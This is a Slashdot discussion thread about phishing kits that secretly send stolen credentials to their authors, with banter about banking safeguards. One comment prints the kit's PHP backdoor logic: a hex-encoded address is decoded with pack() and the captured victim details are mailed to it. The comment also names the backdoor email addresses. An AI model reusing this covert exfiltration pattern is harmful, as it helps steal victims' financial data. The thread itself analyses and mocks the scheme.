Slashdot Mirror
Phishing Group Caught Stealing From Other Phishers
An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them.
Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."
But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
The real "Libtards" are the Libertarians!
Hey, it's open source. Information wants to be free. It's all about sharing. Why shouldn't the developer of the phishing kit get some reward from the organization that profits from repackaging his code?
If they reall wanted to do it right, they could just pool all their resources and split the rewards. They could even invite others to join in, with a BotNet@Home project. Lend your computer to the BotNet, and get a prorated share of the take from stolen credit cards credited to your PayPal account.
Maybe they should bring charges against the script makers. That'd show everyone involved!
...phishers phish phishers... Say that five times fast.
Now if my mom falls victim to a phishing scam, I can rest assured now that her information is in the hands of even more phishers.
Technology Forum
Except they are actually double feeding off innocent people.... some poor chap's info gets stolen by both the guy who deployed the phishing kit and the guy who wrote it.... which means its probably at least twice as likely to get used for fraud.
World of Netcraft.
Phish from a man and you take advantage of him for a day.
Give a man a phishing kit and you take advantage of him for a lifetime.
(of course by "man" we mean spotty-faced script kiddie, and by "lifetime" we mean until he wipes his harddisk, but proverbs are meant to be pithy and brief, not accurate.)
Soylent Green is peoplicious!
Of course all the big names are listed (Bank of America, Regions, etc), but it's too bad you can't zoom in on the screen shots. My local financial institution has been getting phished like crazy lately and it's always the same basic kit. Makes me wonder if it's this kit or something else. Whenever I get one of the emails I just have to check it out on my Mac Book in Firefox with JS disabled just to see if it's anything novel. Never is.
:-)
Naturally Netcraft won't tell you the real site name
they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?
I work for the Department of Redundancy Department.
Ahhh! The meta master. [];
Here's his site: http://thebadboys.org/Brain/
Scandalous I say! this is just tooo literally virtually phishy. Thieves without a code of honour. Is there no honour among thieves? Real fishermen can't ... wait, they can poach, and steal other's fish.
Anybody got a literal virtual stick of dynamite to blow up the caught fish?
Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
.. you just can't trust malware anymore!
Really though, this is nothing new. IIRC, some builds of Sub7 had a reverse backdoor (not covered in the wiki article), as well as a master password that let the Sub7 crew take over a server (covered by the wiki article), and some builds even included hard drive killer when the master password was in use.
What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?
It reminds me of the ol' days on instant messaging when people would pass around a supposed 'Nuke' program that would allow them to reboot people's computers, only to discover that their own computer crashed soon after.
Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".
The grass is always greener on the other side of the light cone.
Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
Isn't it trivial for a government agency like the FBI or Treasury to track payments charged to any kind of electronic banking back to the recipient? Wouldn't an investigation "following the money" ultimately lead you to either the thief or at least greatly disrupt his activities? At a minimum it would expose the people that made their transactions work (banks, hosting companies, other otherwise "normal" business people).
A couple of decent RICO prosecutions and you would drive this stuff out of the United States and greatly reduce the scale of it.
But it never happens, and I can only think that somehow the government has somehow turned these people into some espionage rabbit hole and high level prosecutions would disrupt intelligence gathering. Because there is little reason the government couldn't do something about it if they wanted to.
Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source. Then everyone receiving this spam can provide so many bad account numbers that phishing is very difficult to do without drawing attention to yourself.
It's amazing how many large websites are so vulnerable to even basic attacks. SQL Injection is still rampant (a simple well devised Google search can show you that) and many corporations leave credit card numbers unencrypted. Somebody with basic knowledge of SQL could attack a large amount of organizations without any trouble. I've seen this happen to too many people for me to ever trust important information on smaller sites.
We're all hypocrites. We all have hidden parts, it's the contrast between them that make us more a hypocrite than others
One phisher to phish them all!
In the old days, if thieves stole from thieves, it meant the first thief was deprived of the stolen goods. This lead to conflict. However, with information like this, all it means is that *two* thieves have the same info.
This isn't news. Phishers have always taken advantage of script kiddies to obtain more credit card numbers or the like. Slashdot feels like it is run by 13 year olds. They know what a GeForce 8800 Ultra is, they know what DDR RAM is, they know what Linux and Unix is, but they are hardly advanced computer users.
Not wanting to spoil the optimistic spirit of your own post :o)
Wikileaks, no DNS
I can understand that people do hacking for fun..to show off their programming capabilities..but these kind of activities are forked off by greed..which causes these guys to go any way..i mean doing anything outta way to get a grab at other's grub..
Its a shame !!!
What we need are free phishing kits with trojans that report phishing sites to phishing filter databases or better yet to the administrators of site they're trying to emulate since they'd have the most incentive to take action. The hard part is hiding the trojan and traffic it generates.
You want fun, go home and buy a monkey!
hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so whats the problem?
There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. If, for example, my mother-in-law from Mr. BadGuy Phisher gets an email offering (of all things) heavily discounted embroidery pattern files for her embroidery machine. She thinks he really has such files for sale, she actually does want the product, so she provides her real CC# and not the false one. Now, this is a woman who is keenly aware of the potential for credit card fraud and identity theft. I have seen her save all of her receipts and manual charge slips in a shopping bag so her husband can burn them out in the shop. She is convinced that Bad Men are rooting through trash to collect CC's and banking info. She is convinced that these Bad Men are somehow able to access her account based on the string of numbers that appear on the receipt when she uses her debit card.
Yet, despite this paranoia, she still buys hordes of knick-knacks, limited edition "collectibles", sewing supplies and such on EBay. Paypal being too scary for her, she uses her CC to pay for all of that. Try as I might, I can't seem to persuade her that a person in CA selling cutesy crocheted animal sweaters could be a Bad Man just as easily as some person rooting through her trash. As for email based scams; well, I set up her email client to reject anyone not already in her address book and have trained her in the habit of sending the initial email to them, rather than waiting until she gets one. As a major side benefit for me, it has drastically cut down the number of "cute", "humorous" or "inspirational" forwards she sends me.
*The bar to appear safe and legit enough for some users can be staggeringly low. Lets face it, there are always going to be some stupid people around.
I need a wheelchair van for my son. Help me get the word out. https://www.gofundme.com/wheelchair-van-for-jj
what's the world come to when you can't trust someone selling phishing software!
If you mod me down, I will become more powerful than you can imagine....
Man. Remember when people wanted to use Credit Card numbers as proof of age for adult materials? Glad that never happened!
I Browse at +4 Flamebait
Open Source Sysadmin
Isn't "script kiddies" a form of inverted impartiality in the context of this, or any, summary. It's a bit abiguous and frustrating to some in the way it only reflects the writers point of view of who uses these programs. In the absence of a quirky and original last sentence, an anagram of "script kiddies" is "I predict kids"
It must have been something you assimilated. . . .
One of my ATM cards has 2 different pin numbers. If I use the alternative one, the transaction is completed normally (so no one on the spot gets wiser), but the institution will flag it and notify the police at once, providing my identity and location. I have to pay a little extra for eat (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have this since 1996, and I'm happy to say I never needed.
So yes, the banks know this kind of thing can be done. I wonder why other institutions don't do it or even why this is not mandatory for all cards.
I really don't mind the extra US$ 3/month for this service.
morcego
Back in the BBS days people used to post credit card numbers and phone card numbers as... somebody dumb has got to take the fall for this sh...
But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
I read an even better possibility into this. What if the kit was released by VISA/Master card, Discover, and American Express. They would have a front line into shutting down stolen card numbers, canceling cards and getting great data including IP addresses. Working with merchants, they could follow the canceled sales for a great bust of the ring. Brilliant if true.
The truth shall set you free!
RE: There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. ...C'mon- you can't spot an email from phishers? Not everyone will be able to recognize a phishing scheme- but a large percentage will. That's all that matters once the rest is in operation. No?
It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.
Looking at the code more carefully you'll see..
details.php includes this in the phishing page form:
logon.php has these lines of code:
$d="details.php";
$erorr=file_get_contents($d);
$IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));
and Mr-Brain.php has this:
$send="al-brain@hotmail.fr,albrain08@yahoo.fr";
$str=array($send, $IP);
foreach ($str as $send)
mail($send,$subject,$message,$headers);
Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.
The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com
I'd prefer a system where I could generate a credit card number every time I made a purchase online. Naturally, this is not going to work in stores or such, but at least online you could limit the damage one could do because the number works just once. Furthermore by noting where you've used the number you'd know exactly who has been leaking or misusing your number.
But that would only be useful when you're somehow "forced" to give your PIN isn't it (eg. when there's a gun to your head).
In the case of phishing you simply do not realize that you're giving away information to a fraud! You actually truly, veritably believe that you're doing something harmless, eg. paying for that book on Amazon (probably a bad example, but you get the drift). So why would you use the 'poisoned-PIN' in this situation ?
FYI : this reminds me of that urban legend where you were supposed to enter your PIN backwards to get the same effect (transaction works out OK but police is informed right away, etc...), amazing how many people believed that story... until I asked them what then would happen if your PIN read 1221. (yes, it *used* to be an old PIN number of mine, actually, it was my first ever... and no, that was 15 years ago and it's been changed plenty of times in the meantime and no, no use looking me up, I don't plan on using it again =)
If there is one thing to be learned on slashdot, it has to be sarcasm.
As in any betrayal in the dark world of crime, there is only one solution. Masterphish to thief: "Now phirst you get one warning. But iph you do it again, you will sleep with the phishes..."
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Just like a bunch of nasty, hungry rats caught in a trap together, they all start turning on each other. Bloody funny!
Windows guys please stop pissing on everyone and the Linux guys stop pissing in the wind, hoping to hit Windows guys!
Mr. Brain's Faggots?
What I want to see is financial institutions starting to use my chummer program; catch a phishing site and send the sharks a couple GB of stinking fish guts quality data, until the computer crash and burn from the strain.
Apocalypse Cancelled, Sorry, No Ticket Refunds
Looking at the larger picture, I want as small amount of fraud as possible because the cost of goods will be cheaper. Somebody has to recoup that $4000 or $8000 in your example, but what happens, everyone pays for fraud, but spread out over every purchase made, it is probably lower than the sales tax you pay on each individual transaction.
For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year. You'd also be amazed at the businesses (big box stores and little local stores) that will give you a discount for cash if you ask.
Exactly, in the chat rooms the criminals are far more worried about each other than the forces of law and order. OK they are concerned that the person might be from a security company (our guys) or a police officer. But they are rather more angry about 'rippers' -criminals who take the money but never deliver the goods or take goods and don't pay for them.
In the shadowcrew organization about a third of the management team was occupied as enforcers. In fact that is how they got caught, they ended up in a turf war and someone turned them in to police.
As in all criminal organizations the guys at the bottom get chicken feed. All the money flows up the pyramid, just like the Sopranos. A street drug dealer is likely to be in prison of dead in two to three years on average and makes less than minimum wage. The typical botnet herder makes less than they would flipping burgers. All the money flows up.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
Not so. My mobile company still does that.
While this is an urban legend, several legislatures have proposed requiring banks to have PIN "Panic Codes". http://www.snopes.com/business/bank/pinalert.asp
In the case of palindromic codes, just flip them inside out. i.e. 1221 becomes 2112.
All ideas^H^H^H^H^Hprocesses in this post are Patent Pending. (as well as the process of patenting all postings)
There is a new fad around criminals in my country that is called "flash kidnapping" (loose translation). They grab you, put a gun in your head, and drive you around to several ATM machines.
morcego
And what if my PIN is 1111? Should I enter the two's-compliment?
Many credit card companies offer a free, online service to generate a one-time use CC# (I know Citi and Discover are doing this). You just log on to your account, generate a number for online purchase, and it is only valid to be used that one time.
It allows you to make your purchase online a single time, and if that number gets stolen, any transactions on it are flagged as not yours. At that point, giving out your real number, ever, seems poor, unless you are trying to set up recurring charges.
There's always a bigger phish.
I know this is a bit off topic, but it is related. I'm in the middle of trying to get rid of a phisher/scammer who won an eBay auction of mine. They took over someone else's account (eBay knows about this), bid on my item and won. Then they requested that I send the laptop to Nigeria (in the auction I explicitly stated that I would only send it to the US, Canada, and the UK). I knew that this person was a scammer, it was fairly obvious from the wrong e-mail addresses and Engrish, so I told him/her to stop bothering me. I then get a bunch of fake e-mails to me claiming to be from PayPal and eBay, saying that once I send the laptop, PayPal will release the funds. This person is deliberately preventing me from getting a refund for the auction costs from eBay, and obviously, preventing me from selling this laptop (or at least delaying it). Needless to say, I'm getting pretty annoyed with this guy.
I was able to grab what I believe to be his IP address off of the headers from a couple of e-mails that he sent to me, and found his ISP, but that's about as far as I got. I think that it is actually his IP address, but I'm not sure. My current plan is to send all communications between he and I to eBay, PayPal and the FBI, and be done with it. Any suggestions?
My faith in humanity is shaken! :-)
Wow, so like a 200% chance it gets used for fraud?
"If you are going through hell, keep going." - Winston Churchill
Sure, your cards are getting double-hammered. But that just makes the fraud more conspicuous. Hopefully, your CC company has anti-fraud measures in place to track suspicious purchases.
Just do what I did, open up a bunch of cards, bury yourself, get bad credit. You can't open up accounts if your credit sucks. heh
Bullish Machine Tzar
I use this service for all my online store purchases.
The slick thing about this VAN software is that you can click a button and it populates all the fields in Internet Explorer for you. Unfortunately, I use Firefox, and I've yet to get it to work. So I just copy the numbers across.
You've paid ((2008-1996)*12*3) $432 to "save" you if someone jacks you at the ATM... which typically has a limit of $300 per transaction. And you're paying for a service that is technically trivial to implement and should be given out for free in the first place. Nice.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
Citibank has this feature. They call it "Virtual Account Numbers."
Tsunami -- You can't bring a good wave down!
I never understood why creditors, or even government law enforcement, wouldn't set up dummy accounts and slap them onto a watch list. All they would have to do is discreetly release their "dummy" credit information, and let the morons come to them. It's a win-win situation.
Bank of America calls it "Shop Safe"
Or slashdot comments.
"There is no honor among thieves."
Actually, it's kind of comical that in games like World of Warcraft, not only do warriors and paladins talk about honor, but so to do thieves rogues.
Cutpurs3: Yeah, have a little honor, won't you? Just go invis and stab the guy in the back.
(-1: Post disagrees with my already-settled worldview) is not a valid mod option.
Actually the idea is that if a crook puts a gun to your head and forces you to withdraw money, you can comply with the demand while also having an alert sent out immediately. Excellent security idea. A lot of crooks are forcing their victims to use the ATM cards or to give them the pin. Usually in kidnap situations. Giving the crisis code immediately set the cops on the crooks, hopefully while you're still alive to appreciate it.
They can try either. I keep my cards almost maxed out so the most I can put on them is a half tank of gas and a pack of smokes
Since this is the first I've heard of such a Ponzi Scheme among phishers, I won't claim to know whether, overall, phishing or other identity theft victims will be better or worse off as a direct result. My first guess is that in the big picture, it won't be much of a difference to anybody, even the banks and their insurers.
I do know that I got a bit of visceral pleasure from the headline, and the idea of crooks fighting amongst themselves. Like a prison riot, if all the guards aren't safely on the other side of a good enough fence, it's not as funny as it sounds at first.
All 19 hijackers were known terrorists 09-10-2001. Lack of FBI intelligence does not justify warrantless wiretaps..
I used to take $40 out of the ATM every time I deposited a paycheck. Last year or so I've tried my hardest to use my bank's ATM/visa card as much as possible. I'm down to taking out a 20 about every 3 months. This means everything I buy I have a receipt for, and gets recorded in my checkbook. This goes into my computer, and gets categorized, so I can even tell you for example, how much I spent last year on transportation. (gas and vehicle maintenance) If you're paying everything in cash, you have to count that money and watch your budget all in your head. Maybe you're good with things like that, but that's not something I can do.
Also, my bank is a credit union, which means lots of good things. First, my card pulls from my savings account (as a "sharedraft") so I earn interest on every penny I have available to spend at any time. How much interest are you earning off that wad of 20's in your wallet?
Next, when I use the card as a visa, I don't pay any more, but my credit union takes a 2% cut from the retailer. I see that at the end of the month in the form of a dividend. That's sort of like the discount you have to ask for, but I don't have to ask for it, I always get it as long as I use it as a visa card.
I don't see much of an advantage in using cash nowadays unless you are paranoid about leaving a paper trail for someone trying to watch what you spend.
I work for the Department of Redundancy Department.